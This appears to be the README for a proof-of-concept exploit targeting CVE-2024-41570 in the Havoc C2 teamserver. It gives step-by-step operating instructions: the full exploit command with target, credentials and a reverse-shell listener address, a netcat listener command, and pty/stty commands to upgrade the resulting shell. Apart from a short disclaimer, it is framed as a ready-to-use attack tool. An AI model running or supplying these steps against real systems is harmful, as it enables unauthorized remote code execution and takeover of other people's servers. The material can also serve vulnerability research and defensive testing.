CVE-2024-41570 | Havoc C2 SSRF with RCE | Automated Reverse Shell Exploit via WebSocket

This project provides a Python-based proof-of-concept (PoC) script to exploit a vulnerable WebSocket-based service. The script automates agent registration, WebSocket payload delivery, and remote command execution to establish a reverse shell.

Features

  • Registers an agent to the target service.
  • Opens a WebSocket and sends handshake and authentication payloads.
  • Executes commands remotely via a reverse shell.
  • Provides a guided workflow with clear instructions.

Prerequisites

  • Python 3.x installed on your machine.
  • Install required dependencies by running:
    pip install -r requirements.txt

Installation

  1. Clone this repository:
    git clone https://github.com/<your-repo-name>.git
  2. Navigate to the project directory:
    cd CVE-2024-41570
  3. Install dependencies:
    pip install -r requirements.txt

Usage

Run the script with the required arguments:

python3 exploit.py -t <target_url> -i <teamserver_ip> -p <teamserver_port> -U <username> -P <password> -l <listener_ip> -L <listener_port>

Arguments

  • -t: Target URL of the WebSocket server.
  • -i: IP address of the Team Server from Havoc.
  • -p: Port for the Team Server from Havoc.
  • -U: Username for WebSocket authentication.
  • -P: Password for WebSocket authentication.
  • -l: Listener IP for the reverse shell (your machine).
  • -L: Listener port for the reverse shell (your machine).

Example Command

python3 exploit.py -t http://example.com -i 127.0.0.1 -p 40056 -U 'havocuser' -P 'password123' -l 192.168.1.2 -L 4444

Steps to Execute

  1. Ensure the target service is running and vulnerable.
  2. Run the script with the required parameters.
  3. In a separate terminal, start a listener:
    nc -lvnp <listener_port>
  4. Upgrade the shell:
    python -c 'import pty; pty.spawn("/bin/bash")'
    export TERM=xterm-256color
    stty rows 67 columns 318

Dependencies

The script requires the following Python libraries:

  • requests
  • pycryptodome

Install them using the command:

pip install -r requirements.txt

Security Notice

This script is intended for educational purposes only. Ensure you have explicit authorization to test the target system. Misuse of this script may violate laws and ethical guidelines.

References

Inspired by Default Havoc PoC

Contributing

Contributions are welcome! Feel free to fork the repository and submit a pull request.

License

This project is licensed under the MIT License. See the LICENSE file for details.